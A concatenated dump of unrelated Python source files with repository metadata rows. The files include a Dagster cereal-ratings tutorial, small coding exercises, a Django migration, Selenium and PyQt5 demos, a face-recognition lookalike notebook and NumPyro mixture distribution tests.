        "https://dagster-git-tutorial-nothing-elementl.vercel.app/assets/cereal-ratings.csv.zip",
        "cereal-ratings.csv.zip",
    )
# cereal_ratings_zip_end
# cereal_ratings_csv_start
import zipfile
@asset(non_argument_deps={"cereal_ratings_zip"})
def cereal_ratings_csv() -> None:
    # Unpack cereal-ratings.csv.zip (produced by cereal_ratings_zip) into the
    # current directory. Declared via non_argument_deps because no value is
    # passed between the two assets — only the file on disk.
    with zipfile.ZipFile("cereal-ratings.csv.zip", "r") as zip_ref:
        zip_ref.extractall(".")
# cereal_ratings_csv_end
# nabisco_cereal_ratings_start
@asset(non_argument_deps={"cereal_ratings_csv"})
def nabisco_cereal_ratings(nabisco_cereals):
    # Join the on-disk ratings CSV (written by cereal_ratings_csv) against the
    # Nabisco cereals; returns {cereal name: rating string}.
    with open("cereal-ratings.csv", "r") as f:
        cereal_ratings = {
            row["name"]: row["rating"] for row in csv.DictReader(f.readlines())
        }
    result = {}
    for nabisco_cereal in nabisco_cereals:
        name = nabisco_cereal["name"]
        result[name] = cereal_ratings[name]
    return result
# nabisco_cereal_ratings_end
| [
"noreply@github.com"
] | noreply@github.com |
9363952762d4ee6b82a4c8df7930a32ea9a3d38e | bf142a05b1ca81133134a0edc5c17ae5663f5674 | /raindrops/raindrops.py | e06b1130f72344e3b4017f8530c8567a6161b837 | [
"MIT"
def convert(number):
    """Return the raindrop sounds for *number*, or the number itself as a string."""
    sounds = ""
    for divisor, sound in ((3, "Pling"), (5, "Plang"), (7, "Plong")):
        if has_a_factor(divisor, number):
            sounds += sound
    return sounds if sounds else str(number)


def has_a_factor(divisor, number):
    """True when *divisor* evenly divides *number*."""
    return number % divisor == 0
"rodolfoghi@gmail.com"
] | rodolfoghi@gmail.com |
1a7a8e09a81b8040aac3110112deebcf610eb7f1 | e5235cd85bd39f6217daad41bd36f5d21eb9453c | /crm/customers/migrations/0001_initial.py | 2441f376f23c77e88af0ea60cdf90dab06c90a14 | [] | no_license | nvkgrandhi/micro_demo | e02fa3e78a6ea0e235a26aca0b028bdaa7418ca8 | 536cbab1337f0093dc13e689f91cbb216ff30eee | refs/heads/master | 2021-01-15T10:30:16.359677 | 2016-09-22T06:55:25 | 2016-09-22T06:55:25 | 68,444,191 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,091 | py | # -*- coding: utf-8 -*-
# Generated by Django 1.9.6 on 2016-08-31 10:33
from __future__ import unicode_literals
from django.db import migrations, models
class Migration(migrations.Migration):
    # Auto-generated initial migration (see header comment): creates the
    # Customers table for the customers app. Generated migrations should not
    # be hand-edited beyond comments.

    initial = True

    # First migration of this app, so there are no migration dependencies.
    dependencies = [
    ]

    operations = [
        migrations.CreateModel(
            name='Customers',
            fields=[
                # Implicit auto-increment integer primary key added by Django.
                ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
                ('first_name', models.CharField(max_length=50)),
                ('last_name', models.CharField(max_length=50)),
                ('phone_no', models.IntegerField()),
                ('email', models.EmailField(max_length=254)),
                # Three free-form address fields: contact, shipping, billing.
                ('c_address', models.TextField()),
                ('shipping_address', models.TextField()),
                ('billing_address', models.TextField()),
                ('date_entered', models.DateTimeField()),
                ('c_username', models.CharField(max_length=50)),
                ('c_password', models.CharField(max_length=50)),
            ],
        ),
    ]
| [
"nvk.grandhi@gmail.com"
] | nvk.grandhi@gmail.com |
f0fe8bf81395b500283f072d2cfc7707ccbc1605 | 4904f8a7621abdf94c2024d6a7548f509795031a | /part2_lesson4_part8.py | 2b952ccca5f97acbc75938d5f92c98cee8aa10ee | [] | no_license | tagval/stepik_selenium_course | 945a0dc6539ee1dcb2616b4bdbc6615ce76eac05 | d98955b0e98a7ff9a88248206a2ece595b9040f5 | refs/heads/main | 2023-03-07T17:50:47.678212 | 2021-02-27T16:55:19 | 2021-02-27T16:55:19 | 342,903,793 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 895 | py | from selenium.webdriver.common.by import By
from selenium.webdriver.support.ui import WebDriverWait
from selenium.webdriver.support import expected_conditions as EC
from selenium import webdriver
import math
# Launch a local Chrome session and open the training page for this exercise.
browser = webdriver.Chrome('C:/chromedriver/chromedriver')
browser.get("http://suninjuly.github.io/explicit_wait2.html")
# Explicit wait: block up to 12 seconds until the #price element's text
# contains "100" (the page updates the price asynchronously).
price = WebDriverWait(browser, 12).until(
    EC.text_to_be_present_in_element((By.ID, "price"), "100"))
button1 = browser.find_element(By.ID, "book")
button1.click()
# Scroll down so the answer form comes into view before interacting with it.
browser.execute_script("window.scrollBy(0, 100);")
# Read the task's input number from the page.
x_element = browser.find_element(By.ID,"input_value")
x = x_element.text
def calc(x):
    """Apply the task formula log(|12*sin(x)|) for integer x; return it as a string."""
    inner = 12 * math.sin(int(x))
    return str(math.log(abs(inner)))
y = calc(x)
input1 = browser.find_element(By.TAG_NAME, "input")
# NOTE: send_keys() returns None, so this rebinding discards the element
# reference; harmless here because input1 is not used again.
input1 = input1.send_keys(y)
button2 = browser.find_element(By.CSS_SELECTOR, "[type='submit']")
# Same pattern: click() returns None; button2 is not reused afterwards.
button2 = button2.click()
browser.quit()
"elanskaiavaleriia@gmail.com"
] | elanskaiavaleriia@gmail.com |
fe6afb0a5ceacf91383ce734fe45b592f58f00f9 | d05a59feee839a4af352b7ed2fd6cf10a288a3cb | /xlsxwriter/test/comparison/test_chart_axis30.py | 9e4ec252d029acea26ddf0d4218712e6c3c78c56 | [
"BSD-2-Clause-Views"
] | permissive | elessarelfstone/XlsxWriter | 0d958afd593643f990373bd4d8a32bafc0966534 | bb7b7881c7a93c89d6eaac25f12dda08d58d3046 | refs/heads/master | 2020-09-24T06:17:20.840848 | 2019-11-24T23:43:01 | 2019-11-24T23:43:01 | 225,685,272 | 1 | 0 | NOASSERTION | 2019-12-03T18:09:06 | 2019-12-03T18:09:05 | null | UTF-8 | Python | false | false | 1,350 | py | ###############################################################################
#
# Tests for XlsxWriter.
#
# Copyright (c), 2013-2019, John McNamara, jmcnamara@cpan.org
#
from ..excel_comparsion_test import ExcelComparisonTest
from ...workbook import Workbook
class TestCompareXLSXFiles(ExcelComparisonTest):
    """
    Test file created by XlsxWriter against a file created by Excel.
    """

    def setUp(self):
        self.set_filename('chart_axis30.xlsx')

    def test_create_file(self):
        """Test the creation of a simple XlsxWriter file."""
        workbook = Workbook(self.got_filename)

        worksheet = workbook.add_worksheet()
        chart = workbook.add_chart({'type': 'line'})

        # Fix the axis ids so the output matches the reference file exactly.
        chart.axis_ids = [69200896, 69215360]

        data = [
            [1, 2, 3, 4, 5],
            [2, 4, 6, 8, 10],
            [3, 6, 9, 12, 15],
        ]

        chart.set_x_axis({'position_axis': 'on_tick'})

        # Write each data column (A1, B1, C1), then add one series per column.
        for column_letter, values in zip('ABC', data):
            worksheet.write_column(column_letter + '1', values)

        for column_letter in 'ABC':
            chart.add_series(
                {'values': '=Sheet1!$%s$1:$%s$5' % (column_letter, column_letter)})

        worksheet.insert_chart('E9', chart)

        workbook.close()

        self.assertExcelEqual()
| [
"jmcnamara@cpan.org"
] | jmcnamara@cpan.org |
44d8425b208455af67d6a623c4d696395a4de417 | 7a813b486667c779c9448a2a177279fabf1821d0 | /ikinciProje/QT_Elemanlari4.py | d8111a87992092d1b0f9fd6bcc1f30ea7af99c7a | [] | no_license | ilker07/pythonProjeler2 | bc1ca6882ee273f9e9317347ba0a90dff13c0797 | ece48c4bb9b13ccb5ac1b314b81a3148aa0472d1 | refs/heads/master | 2020-08-01T03:19:01.805408 | 2019-09-25T12:55:52 | 2019-09-25T12:55:52 | 210,842,979 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,567 | py |
import sys
from PyQt5.QtWidgets import *
class TabWidgetPencere(QTabWidget):
    """Demo window showing a three-tab QTabWidget with simple form layouts."""

    def __init__(self):
        super().__init__()
        self.tab1 = QTabWidget()  # could also be a plain QWidget
        self.tab2 = QTabWidget()
        self.tab3 = QTabWidget()
        # Build each tab's contents before adding the tabs to the widget.
        self.Tablo1()
        self.Tablo2()
        self.Tablo3()
        self.addTab(self.tab1, "Bilgiler")
        self.addTab(self.tab2, "Kişisel")
        self.addTab(self.tab3, "Hakkında")
        self.setWindowTitle("QTabWidget")
        self.setTabPosition(QTabWidget.North)
        self.setTabShape(QTabWidget.Triangular)
        self.setTabsClosable(True)
        self.setTabToolTip(0, "Bilgiler Bölümü")
        self.setTabToolTip(1, "Kişisel Bölümü")
        self.setTabToolTip(2, "Hakkında Bölümü")
        self.setMovable(True)
        self.tabCloseRequested.connect(self.kapat)
        self.show()

    def kapat(self, q):
        """Close-request handler: remove the tab at index *q*."""
        self.removeTab(q)

    def Kapat(self):
        # NOTE(review): unused slot, kept for interface compatibility.
        # removeTab() expects an int index, but sender() returns a QObject,
        # so connecting this as-is would not work — confirm intent before
        # wiring it up (self.indexOf(...) would be needed).
        sender = self.sender()
        self.removeTab(sender)

    def Tablo1(self):
        """Populate tab1 with name/surname line edits."""
        h_box = QHBoxLayout()
        h_box2 = QHBoxLayout()
        v_box = QVBoxLayout()

        self.adLabel = QLabel("Ad: ")
        self.soyadLabel = QLabel("Soyad:")
        self.lineEdit1 = QLineEdit()
        self.lineEdit2 = QLineEdit()

        h_box.addWidget(self.adLabel)
        h_box.addWidget(self.lineEdit1)
        h_box2.addWidget(self.soyadLabel)
        h_box2.addWidget(self.lineEdit2)

        v_box.addStretch()
        v_box.addLayout(h_box)
        v_box.addLayout(h_box2)
        v_box.addStretch()

        self.tab1.setLayout(v_box)

    def Tablo2(self):
        """Populate tab2 with an age spin box and a submit button."""
        h_box = QHBoxLayout()
        h_box2 = QHBoxLayout()
        v_box = QVBoxLayout()

        self.yasLabel = QLabel("Yaş: ")
        # NOTE: rebinds self.lineEdit1 (set to a QLineEdit in Tablo1).
        self.lineEdit1 = QSpinBox()
        self.buton = QPushButton("Gönder")

        h_box.addWidget(self.yasLabel)
        h_box.addWidget(self.lineEdit1)
        h_box2.addWidget(self.buton)

        v_box.addStretch()
        v_box.addLayout(h_box)
        v_box.addLayout(h_box2)
        v_box.addStretch()

        # Bug fix: the original also called self.tab1.setLayout(...) here, but
        # tab1 already has a layout from Tablo1(), so Qt ignored the call and
        # emitted a "QWidget::setLayout: ... already has a layout" warning.
        self.tab2.setLayout(v_box)

    def Tablo3(self):
        """Populate tab3 with a static about label."""
        h_box = QHBoxLayout()
        self.label = QLabel()
        self.label.setText("İlker Mustafa Aykut")
        h_box.addWidget(self.label)
        self.tab3.setLayout(h_box)
# Application entry point: create the Qt app, construct the tabbed window
# (which shows itself in __init__), and run the event loop until exit.
app=QApplication(sys.argv)
tab=TabWidgetPencere()
sys.exit(app.exec_())
| [
"noreply@github.com"
] | noreply@github.com |
0cb18c06d4974881f1dc288fc8f99a559cac9f83 | d48c03d5d925a3626dacf7e071fd1844165aa816 | /day2-4.py | 1f9f614cd1f7ef3e9ab3f56343e7c2fc771a0f3e | [] | no_license | Nene888/Python200804 | 2ec8ae4c304842418a09885600fe221cb4b0680d | e31364fb9f80fadb1be9f8a6aa3ccdedc11dec16 | refs/heads/master | 2022-11-25T12:46:35.115403 | 2020-08-04T08:55:10 | 2020-08-04T08:55:10 | 284,927,210 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 229 | py | # -*- coding: utf-8 -*-
"""
Created on Tue Aug 4 14:29:31 2020
@author: USER
"""
# Start with four fruits, then demonstrate append/insert/remove equivalents.
ww = ['芒果', '西瓜', '蘋果', '鳳梨']
ww += ['榴槤']  # same effect as ww.append('榴槤')
print(ww)
ww[2:2] = ['檸檬']  # same effect as ww.insert(2, '檸檬')
print(ww)
del ww[ww.index('榴槤')]  # same effect as ww.remove('榴槤')
print(ww)
"noreply@github.com"
] | noreply@github.com |
cd0aa0709e33dd26bd91d1e55facc99254e15216 | d0b6940acef2dd8ee8e37dc1034cb7e6799889f8 | /build/ur_e_description/catkin_generated/pkg.installspace.context.pc.py | eae8692e9c7a38050d6c96c32a004725305a6ce3 | [] | no_license | robwoidi/ws_MoveIt | 5477202f01e7ddd9c4bdf21187c755fe80bf6c4d | 9b004cd792193337f9f3e628ded7a63e97f85295 | refs/heads/master | 2023-07-06T01:54:24.311735 | 2021-08-08T11:57:34 | 2021-08-08T11:57:34 | 393,943,940 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 380 | py | # generated from catkin/cmake/template/pkg.context.pc.in
# The string literals below are substituted by catkin's CMake template at
# configure time; empty strings mean this package exports no include dirs,
# no libraries, and no catkin dependencies.
CATKIN_PACKAGE_PREFIX = ""
PROJECT_PKG_CONFIG_INCLUDE_DIRS = "".split(';') if "" != "" else []  # evaluates to []
PROJECT_CATKIN_DEPENDS = "".replace(';', ' ')  # evaluates to ""
PKG_CONFIG_LIBRARIES_WITH_PREFIX = "".split(';') if "" != "" else []  # evaluates to []
PROJECT_NAME = "ur_e_description"
PROJECT_SPACE_DIR = "/home/stefan/ws_moveit/install"
PROJECT_VERSION = "1.2.7"
| [
"woidi@t-online.de"
] | woidi@t-online.de |
92b993bc968fb1474af2b62d15d6c00134f51a89 | 2baa8c8b4394d2e35fa4a31064d8164bda472a33 | /natural-helpers-sematic/Dynamic Echo Chamber Code/runAll.py | 5800eef69f8cbefa5bd95cf98f48fe9bad69f3d6 | [] | no_license | ZencoderO/Code-Examples | 2c15f25ebc3596d4ea0a9350f058ea89d00e9439 | 6b4f7e649e191c68c8c2c0573057a93156b85c6c | refs/heads/main | 2023-03-25T23:23:09.647451 | 2021-03-21T04:38:58 | 2021-03-21T04:38:58 | 341,817,551 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 171 | py | import sys
import createComunities
import proccessDataNoSciKit
import printDatNoSciKit
# NOTE(review): createComunities / proccessDataNoSciKit / printDatNoSciKit
# are imported as MODULES above but invoked like functions here — calling a
# module object raises TypeError. Presumably each module exposes a same-named
# function (or a main()); confirm and call that instead.
# NOTE(review): sys.argv[0] is the script path itself; the intended inputs
# are probably sys.argv[1] and sys.argv[2] — verify how runAll is invoked.
createComunities(sys.argv[0],sys.argv[1])
proccessDataNoSciKit()
printDatNoSciKit()
| [
"noreply@github.com"
] | noreply@github.com |
c174eeaece6b1b311b305f2b8e6aae548566a5fb | b314518eb3e33c872f880c4f80a0f3d0856cf9ee | /12_marks.py | bd31d77188a83adcb12a63ab0e53a8fd0675250c | [] | no_license | namntran/2021_python_principles | 0ba48d2cb6ff32a4fefd0b13ae24d2376e17740e | bf33210f9b0e02dfefe7a9a008936e8f47d25149 | refs/heads/main | 2023-03-10T15:47:48.930202 | 2021-02-25T07:27:53 | 2021-02-25T07:27:53 | 330,814,436 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 964 | py | # 12_marks.py
# Prompt for and read marks for a test until a negative number is entered.
# Print the number of marks entered and the average (arithmetic mean) of marks
# Print the highest and lowest marks
# use indefinite loop - while loop
# Running tallies plus a primed read: the first entered mark also seeds the
# highest/lowest trackers, so they always hold a real value (even when the
# very first input is the negative sentinel that ends the loop).
count = 0
total = 0.0
mark = float(input("Enter a mark: "))
highest = mark
lowest = mark

while mark >= 0.0:
    count += 1
    total += mark
    highest = max(highest, mark)
    lowest = min(lowest, mark)
    mark = float(input("Enter a mark: "))

print("The number of marks: ", count)
if count > 0:  # an average only exists when at least one mark was entered
    print("The average mark is: ", total / count)
print("The lowest mark is: ", lowest)
print("The highest mark is: ", highest)
| [
"namtran78@gmail.com"
] | namtran78@gmail.com |
5081ba74faf068dafa072c75ebd968f006d2a8d4 | 7356b5b759ad072b1277470dbe9c777ff08ca22d | /Adventure/inventory.py | b7e82e37101cc696d3d8d8c52830ac8f88981146 | [] | no_license | Nmad7/A-forest-adventure | a206348c302b126598492c13a01ea52aad47533e | 9703657074f744711ed9fe3fa51c07afda829dc0 | refs/heads/master | 2021-09-01T01:05:31.512322 | 2017-12-24T01:44:04 | 2017-12-24T01:44:04 | 115,231,677 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,518 | py | '''
A model of an inventory
Created on Nov 20, 2017
@author: ngm7
'''
class Inventory():
    '''
    A class which keeps track of player inventory and allows changes to it
    '''

    def __init__(self):
        '''
        Initializes an empty inventory and item classes
        '''
        self.itemInventory = {'food': 0, 'water': 0, 'rope': 0, 'knife': 0,
                              'rifle': 0, 'painkiller': 0, 'first aid kit': 0,
                              'antibiotic': 0}
        # Painkiller state: countdown until the temporary boost wears off,
        # whether a painkiller is currently active, and whether the delayed
        # wear-off damage has been applied.
        self.painkiller_counter = 0
        self.painkiller_active = False
        self.painkiller_damage = False

    def AddInventory(self, item, amount):
        '''Add *amount* units of *item* to the inventory.'''
        self.itemInventory[item] += amount

    def SubInventory(self, item, amount=1):
        '''Remove *amount* units of *item* (default 1).

        Note: there is no floor at zero — callers are expected to check
        in_inventory() first, otherwise counts can go negative.
        '''
        self.itemInventory[item] -= amount

    def get_inventory_item(self, item):
        '''Return the current count of *item*.'''
        return self.itemInventory[item]

    def get_inventory(self):
        '''Return the full inventory as a "count-name~~~..." display string.'''
        return "".join("%s-%s~~~" % (count, name)
                       for name, count in self.itemInventory.items())

    def in_inventory(self, item):
        '''Return True when *item* is a known item with a positive count.'''
        return item in self.itemInventory and self.get_inventory_item(item) > 0

    def camp_meal(self):
        '''Report the player's food/water status for a camp meal.

        FIXME (kept from original): this was meant to also remove one food
        and one water from the inventory, but it only inspects the counts.
        '''
        if self.itemInventory['food'] == 0 and self.itemInventory['water'] == 0:
            return "starving and thirsty"
        elif self.itemInventory['food'] == 0:
            return "starving"
        elif self.itemInventory['water'] == 0:
            return "thirsty"
        else:
            return "good"

    # PAINKILLER FUNCTIONS
    def painkiller_use(self, player):
        '''Activate a painkiller: +2 health now; the boost is removed after
        the counter reaches zero (see painkiller_wearoff).'''
        self.painkiller_counter = 2
        player.health.add_health(2)
        self.painkiller_active = True

    def painkiller_wearoff(self, player):
        '''Nightly tick: count down an active painkiller and, once the
        counter hits zero, apply the delayed 2-point wear-off damage.'''
        if self.painkiller_counter == 0 and self.painkiller_active:
            player.health.take_damage(2)
            self.painkiller_active = False
            self.painkiller_damage = True
        elif self.painkiller_active:
            self.painkiller_counter -= 1
# Quick manual smoke test: print the starting count of 'food' (expected 0).
if __name__=="__main__":
    inventory = Inventory()
    print(inventory.get_inventory_item('food'))
| [
"noreply@github.com"
] | noreply@github.com |
815c29c7ac315b39685f4cb97cfe0129b2f4b029 | b2c0517a0421c32f6782d76e4df842875d6ffce5 | /Algorithms/Dynamic Programming/121. Best Time to Buy and Sell Stock.py | ebf0f3692c9e7ba74f468b736b65e900ba63d3d1 | [] | no_license | SuYuxi/yuxi | e875b1536dc4b363194d0bef7f9a5aecb5d6199a | 45ad23a47592172101072a80a90de17772491e04 | refs/heads/master | 2022-10-04T21:29:42.017462 | 2022-09-30T04:00:48 | 2022-09-30T04:00:48 | 66,703,247 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,053 | py | #Forward
class Solution(object):
    def maxProfit(self, prices):
        """Single forward pass: track the cheapest buy price seen so far and
        the best spread obtainable by selling at the current price."""
        if not prices:
            return 0
        cheapest = prices[0]
        best = 0
        for price in prices:
            cheapest = min(cheapest, price)
            best = max(best, price - cheapest)
        return best
#Backward
class Solution(object):
    def maxProfit(self, prices):
        """Single backward pass: track the highest future sell price and the
        best spread obtainable by buying at the current price."""
        best_sell = 0
        best = 0
        for price in reversed(prices):
            if price > best_sell:
                best_sell = price
            else:
                best = max(best, best_sell - price)
        return best
#Kadane's Algorithm
#Max sum Contiguous subarray search
class Solution(object):
def maxProfit(self, prices):
L = []
for i in range(1, len(prices)):
L.append(prices[i] - prices[i-1])
maxCur = 0
maxSofar = 0
for i in L:
maxCur = max(0, maxCur + i)
maxSofar = max(maxSofar, maxCur)
return maxSofar
#Lite version
class Solution(object):
    def maxProfit(self, prices):
        """Kadane's algorithm over day-to-day deltas, without building the
        intermediate difference list."""
        running = 0
        best = 0
        for yesterday, today in zip(prices, prices[1:]):
            running = max(0, running + today - yesterday)
            best = max(best, running)
        return best
| [
"soration2099@gmail.com"
] | soration2099@gmail.com |
8a680ee2aed29c19da1dff4e54875c68891b75dc | b746470138e95b56d67ecfe376c439c7de094357 | /find_your_celebrity_lookalike_with_computer_vision_594.py | a5dd79b7103bfecaf4c58df3892a3ed73dbe974d | [] | no_license | mdtahsinasif/CloudLab | aaf896990612c364a85f22a84378b193749185b9 | 601b6b3c8dd37b368390e3a2ee4dcc296541bdf2 | refs/heads/main | 2023-03-26T06:08:16.756202 | 2021-03-09T11:20:57 | 2021-03-09T11:20:57 | 330,952,349 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,917 | py | #!/usr/bin/env python
# coding: utf-8
# In[18]:
get_ipython().system('mkdir ../lookalikeceleb/')
# In[19]:
import face_recognition
import os
import numpy as np
from IPython.display import Image
# In[20]:
def load_images(known_images_dir):
    """Encode every face image found in *known_images_dir*.

    Returns a pair (encodings, filenames) covering only the files in which
    face_recognition detected at least one face.
    """
    encodings = []
    filenames = []
    for entry in os.listdir(known_images_dir):
        # fsdecode turns a possibly-bytes directory entry into a str filename
        filename = os.fsdecode(entry)
        image = face_recognition.load_image_file(
            os.path.join(known_images_dir, filename))
        faces = face_recognition.face_encodings(image)
        if faces:
            encodings.append(faces[0])
            filenames.append(filename)
    return (encodings, filenames)
# In[21]:
def calculate_face_distance(known_encodings, unknown_img_path, cutoff=0.5, num_results=4):
    # NOTE(review): cutoff and num_results are accepted but never used.
    # NOTE(review): this relies on the module-global known_images (filled by
    # load_images above) rather than a parameter — the two must stay in sync.
    image_to_test = face_recognition.load_image_file(unknown_img_path)
    # Encoding of the first detected face; raises IndexError if no face is found.
    image_to_test_encoding = face_recognition.face_encodings(image_to_test)[0]
    face_distances = face_recognition.face_distance(known_encodings, image_to_test_encoding)
    # Return the input path plus the filename of the closest known face.
    return (unknown_img_path, known_images[face_distances.argmin()])
# In[22]:
# Build the gallery of known celebrity faces once at import time.
known_encodings, known_images = load_images("/cxldata/projects/lookalikeceleb/images")

# In[23]:

original_image = "../lookalikeceleb/myimage.jpg"
# Displays the uploaded photo when evaluated in a Jupyter cell.
Image(filename=original_image)

# In[16]:

# Element [1] of the returned (path, match) pair: filename of the closest face.
matching_image = calculate_face_distance(known_encodings, original_image)[1]
# In[17]:
import matplotlib.pyplot as plt
import matplotlib.image as mpimg
from matplotlib import rcParams
# Jupyter magic: render matplotlib figures inline in the notebook.
get_ipython().run_line_magic('matplotlib', 'inline')

# read images: the uploaded photo and its closest celebrity match
img_1 = mpimg.imread(original_image)
img_2 = mpimg.imread('/cxldata/projects/lookalikeceleb/images/' + matching_image)

# display images side by side
fig, ax = plt.subplots(1,2)
ax[0].imshow(img_1);
ax[1].imshow(img_2);
print('Hey, you look like ' + os.path.splitext(matching_image)[0] + '!')
# In[ ]:
| [
"noreply@github.com"
] | noreply@github.com |
d84cdd667cd99b39e7bb85cdc640ce9d2da56e13 | ee7abc2f88faf56699197732bf215fd0b1c0d992 | /18.LocalChat/vd/vd2.py | 59d273191d294a28fa1951d649768a8493d74df9 | [] | no_license | hntvinh90/python_project | 4bd2256885ff2efc48f7c35959a3f05ba507c2c8 | 489da9cd309f79d56a020334ce5a80480e678b70 | refs/heads/master | 2020-04-25T19:10:14.350978 | 2019-02-28T16:53:49 | 2019-02-28T16:53:49 | 173,009,904 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 110 | py | #!/usr/bin/python
""""""
def main():
    """Placeholder entry point; always reports success."""
    return True
if __name__ == '__main__':
    main()
# The literals below are leftover scratch text: bare string expressions are
# evaluated and immediately discarded, so they have no runtime effect.
'''
'''
'asdas'
| [
"honguyenthanhvinh@gmail.com"
] | honguyenthanhvinh@gmail.com |
e86d67f32b9eade3829748ae16ebc5608042241f | f791462fb1286607d16459c1602d133f8d8c8b59 | /test/test_distributions_mixture.py | a1ab093e65ea5c73f333d6fcd898c35cb3340e73 | [
"Apache-2.0"
] | permissive | pyro-ppl/numpyro | b071ed2bd93be41bafc3da8764c9f5617f996d92 | ca96eca8e8e1531e71ba559ef7a8ad3b4b68cbc2 | refs/heads/master | 2023-09-03T15:56:13.252692 | 2023-08-28T14:32:25 | 2023-08-28T14:32:25 | 170,580,540 | 1,941 | 219 | Apache-2.0 | 2023-09-04T11:26:11 | 2019-02-13T21:13:59 | Python | UTF-8 | Python | false | false | 5,161 | py | # Copyright Contributors to the Pyro project.
# SPDX-License-Identifier: Apache-2.0
import pytest
import jax
import jax.numpy as jnp
import numpyro.distributions as dist
rng_key = jax.random.PRNGKey(42)
def get_normal(batch_shape):
    """Get parameterized Normal with given batch shape."""
    return dist.Normal(loc=jnp.zeros(batch_shape), scale=jnp.ones(batch_shape))
def get_mvn(batch_shape):
    """Get parameterized MultivariateNormal with given batch shape."""
    dimensions = 2
    loc = jnp.zeros((*batch_shape, dimensions))
    cov_matrix = jnp.eye(dimensions, dimensions)
    # Tile the parameters across each requested batch dimension.
    # NOTE(review): loc already includes batch_shape via jnp.zeros above, so
    # this loop appears to add the batch dims to loc a second time (cov_matrix
    # starts unbatched and is expanded as intended) — confirm against the
    # shape expectations in _test_mixture before changing anything.
    for i, s in enumerate(batch_shape):
        loc = jnp.repeat(jnp.expand_dims(loc, i), s, axis=i)
        cov_matrix = jnp.repeat(jnp.expand_dims(cov_matrix, i), s, axis=i)
    mvn = dist.MultivariateNormal(loc=loc, covariance_matrix=cov_matrix)
    return mvn
@pytest.mark.parametrize("jax_dist_getter", [get_normal, get_mvn])
@pytest.mark.parametrize("nb_mixtures", [1, 3])
@pytest.mark.parametrize("batch_shape", [(), (1,), (7,), (2, 5)])
@pytest.mark.parametrize("same_family", [True, False])
def test_mixture_same_batch_shape(
    jax_dist_getter, nb_mixtures, batch_shape, same_family
):
    """Mixture where mixing weights and components share one batch shape."""
    # Uniform mixture weights, tiled across every requested batch dimension.
    mixing_probabilities = jnp.ones(nb_mixtures) / nb_mixtures
    for i, s in enumerate(batch_shape):
        mixing_probabilities = jnp.repeat(
            jnp.expand_dims(mixing_probabilities, i), s, axis=i
        )
    # Sanity check: the tiled weights still sum to 1 along the mixture axis.
    assert jnp.allclose(mixing_probabilities.sum(axis=-1), 1.0)
    mixing_distribution = dist.Categorical(probs=mixing_probabilities)
    # same_family=True supplies one batched component distribution (extra
    # trailing mixture dim); False supplies a list of per-component dists.
    if same_family:
        component_distribution = jax_dist_getter((*batch_shape, nb_mixtures))
    else:
        component_distribution = [
            jax_dist_getter(batch_shape) for _ in range(nb_mixtures)
        ]
    _test_mixture(mixing_distribution, component_distribution)
@pytest.mark.parametrize("jax_dist_getter", [get_normal, get_mvn])
@pytest.mark.parametrize("nb_mixtures", [3])
@pytest.mark.parametrize("mixing_batch_shape, component_batch_shape", [[(2,), (7, 2)]])
@pytest.mark.parametrize("same_family", [True, False])
def test_mixture_broadcast_batch_shape(
    jax_dist_getter, nb_mixtures, mixing_batch_shape, component_batch_shape, same_family
):
    """Mixture whose mixing and component batch shapes must broadcast."""
    # Create mixture: uniform weights tiled over the (smaller) mixing batch shape.
    mixing_probabilities = jnp.ones(nb_mixtures) / nb_mixtures
    for i, s in enumerate(mixing_batch_shape):
        mixing_probabilities = jnp.repeat(
            jnp.expand_dims(mixing_probabilities, i), s, axis=i
        )
    assert jnp.allclose(mixing_probabilities.sum(axis=-1), 1.0)
    mixing_distribution = dist.Categorical(probs=mixing_probabilities)
    # Components use the larger batch shape; the mixture must broadcast.
    if same_family:
        component_distribution = jax_dist_getter((*component_batch_shape, nb_mixtures))
    else:
        component_distribution = [
            jax_dist_getter(component_batch_shape) for _ in range(nb_mixtures)
        ]
    _test_mixture(mixing_distribution, component_distribution)
def _test_mixture(mixing_distribution, component_distribution):
    """Shared checks: build a Mixture and verify its shapes, sampling,
    log_prob, intermediates, mean/variance, and cdf."""
    # Create mixture
    mixture = dist.Mixture(
        mixing_distribution=mixing_distribution,
        component_distributions=component_distribution,
    )
    assert (
        mixture.mixture_size == mixing_distribution.probs.shape[-1]
    ), "Mixture size needs to be the size of the probability vector"
    # A single Distribution carries the mixture dim as its last batch dim;
    # a list of distributions each carry the plain batch shape.
    if isinstance(component_distribution, dist.Distribution):
        assert (
            mixture.batch_shape == component_distribution.batch_shape[:-1]
        ), "Mixture batch shape needs to be the component batch shape without the mixture dimension."
    else:
        assert (
            mixture.batch_shape == component_distribution[0].batch_shape
        ), "Mixture batch shape needs to be the component batch shape."
    # Test samples
    sample_shape = (11,)
    # Samples from component distribution(s): one draw per mixture component.
    component_samples = mixture.component_sample(rng_key, sample_shape)
    assert component_samples.shape == (
        *sample_shape,
        *mixture.batch_shape,
        mixture.mixture_size,
        *mixture.event_shape,
    )
    # Samples from mixture
    samples = mixture.sample(rng_key, sample_shape=sample_shape)
    assert samples.shape == (*sample_shape, *mixture.batch_shape, *mixture.event_shape)
    # Check log_prob: one value per sample/batch element (event dims reduced).
    lp = mixture.log_prob(samples)
    nb_value_dims = len(samples.shape) - mixture.event_dim
    expected_shape = samples.shape[:nb_value_dims]
    assert lp.shape == expected_shape
    # Samples with indices: intermediates expose the chosen component index.
    samples_, [indices] = mixture.sample_with_intermediates(
        rng_key, sample_shape=sample_shape
    )
    assert samples_.shape == samples.shape
    assert indices.shape == (*sample_shape, *mixture.batch_shape)
    assert jnp.issubdtype(indices.dtype, jnp.integer)
    assert (indices >= 0).all() and (indices < mixture.mixture_size).all()
    # Check mean
    mean = mixture.mean
    assert mean.shape == mixture.shape()
    # Check variance
    var = mixture.variance
    assert var.shape == mixture.shape()
    # Check cdf (only defined for scalar-event mixtures).
    if mixture.event_shape == ():
        cdf = mixture.cdf(samples)
        assert cdf.shape == (*sample_shape, *mixture.shape())
| [
